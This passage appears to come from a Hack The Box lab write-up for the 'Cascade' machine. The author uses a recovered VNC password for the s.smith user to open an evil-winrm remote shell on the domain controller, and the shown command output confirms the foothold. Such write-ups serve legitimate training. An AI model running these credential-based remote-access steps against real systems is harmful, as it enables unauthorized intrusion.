WinRM
I have initially discovered a WinRM service running on the target system port 5985
There was nothing to be done as I did not have any valid domain credential with such privileges.
I was able to decrypt and recover the encrypted VNC password, which turned out to belong to the s.smith user
The s.smith user is part of the Remote Management Users group as enumerated from both ldapdomaindump and bloodhound
Here, I will attempt to gain an initial foothold to the DC host via WinRM
┌──(kali㉿kali)-[~/archive/htb/labs/cascade]
└─$ evil-winrm -i casc-dc1.cascade.local -u s.smith -p 'sT333ve2'
Evil-WinRM shell v3.4
warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
info: Establishing connection to remote endpoint
*evil-winrm* ps c:\Users\s.smith\Documents> whoami
cascade\s.smith
*evil-winrm* ps c:\Users\s.smith\Documents> hostname
CASC-DC1
*evil-winrm* ps c:\Users\s.smith\Documents> ipconfig
Windows IP Configuration
ethernet adapter local area connection 4:
connection-specific dns suffix . :
ipv6 address. . . . . . . . . . . : dead:beef::e8dc:7157:1983:a2bd
link-local ipv6 address . . . . . : fe80::e8dc:7157:1983:a2bd%15
ipv4 address. . . . . . . . . . . : 10.10.10.182
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : fe80::250:56ff:feb9:f330%15
10.10.10.2
tunnel adapter isatap.{603b363a-a965-4463-a4d0-a8850f844e1e}:
media state . . . . . . . . . . . : Media disconnected
connection-specific dns suffix . :Initial Foothold established to the target system as the s.smith user via WinRM